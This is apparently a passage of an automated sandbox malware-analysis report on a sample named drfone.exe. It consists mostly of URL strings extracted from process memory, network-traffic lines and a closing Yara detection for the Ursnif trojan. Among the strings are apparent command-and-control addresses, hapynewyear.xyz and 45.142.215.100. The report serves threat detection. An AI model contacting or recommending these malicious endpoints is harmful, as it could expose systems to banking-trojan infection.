Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000027.00000000.499661832.000000000E220000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000027.00000000.499661832.000000000E220000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: msapplication.xml.5.dr String found in binary or memory: http://www.amazon.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000020.00000002.509231908.00000276C608F000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000027.00000002.716897951.000000000095C000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: msapplication.xml1.5.dr String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: msapplication.xml2.5.dr String found in binary or memory: http://www.live.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: msapplication.xml3.5.dr String found in binary or memory: http://www.nytimes.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: msapplication.xml4.5.dr String found in binary or memory: http://www.reddit.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: msapplication.xml5.5.dr String found in binary or memory: http://www.twitter.com/
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: msapplication.xml6.5.dr String found in binary or memory: http://www.wikipedia.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: msapplication.xml7.5.dr String found in binary or memory: http://www.youtube.com/
Source: explorer.exe, 00000027.00000000.498255027.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000027.00000000.499895320.000000000E313000.00000002.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: explorer.exe, 00000027.00000002.726154750.00000000045BE000.00000004.00000001.sdmp String found in binary or memory: https://45.142.215.100/index.html7
Source: powershell.exe, 00000020.00000002.517801949.00000276D5EE5000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000020.00000002.517801949.00000276D5EE5000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000020.00000002.517801949.00000276D5EE5000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000020.00000002.509231908.00000276C608F000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: drfone.exe String found in binary or memory: https://hapynewyear.xyz
Source: imagestore.dat.6.dr, imagestore.dat.5.dr String found in binary or memory: https://hapynewyear.xyz/favicon.ico
Source: explorer.exe, 00000027.00000000.499591103.000000000D4F9000.00000004.00000001.sdmp, ~DF11859F0CE418C879.TMP.5.dr String found in binary or memory: https://hapynewyear.xyz/index.htm
Source: explorer.exe, 00000027.00000000.499591103.000000000D4F9000.00000004.00000001.sdmp String found in binary or memory: https://hapynewyear.xyz/index.htm(
Source: explorer.exe, 00000027.00000000.499591103.000000000D4F9000.00000004.00000001.sdmp String found in binary or memory: https://hapynewyear.xyz/index.htm6
Source: explorer.exe, 00000027.00000000.499591103.000000000D4F9000.00000004.00000001.sdmp String found in binary or memory: https://hapynewyear.xyz/index.htm8
Source: explorer.exe, 00000027.00000000.499591103.000000000D4F9000.00000004.00000001.sdmp String found in binary or memory: https://hapynewyear.xyz/index.htmJ
Source: {62186B8C-460C-11EB-90E5-ECF4BB2D2496}.dat.5.dr String found in binary or memory: https://hapynewyear.xyz/index.htmRoot
Source: explorer.exe, 00000027.00000000.499591103.000000000D4F9000.00000004.00000001.sdmp String found in binary or memory: https://hapynewyear.xyz/index.htmr
Source: explorer.exe, 00000027.00000000.499591103.000000000D4F9000.00000004.00000001.sdmp String found in binary or memory: https://hapynewyear.xyz/index.htmz
Source: {62186B8C-460C-11EB-90E5-ECF4BB2D2496}.dat.5.dr String found in binary or memory: https://hapynewyear.xyz/index.htmz/index.htm
Source: powershell.exe, 00000020.00000002.517801949.00000276D5EE5000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: drfone.exe String found in binary or memory: https://sectigo.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.348748393.0000000003780000.00000004.00000040.sdmp, type: MEMORY
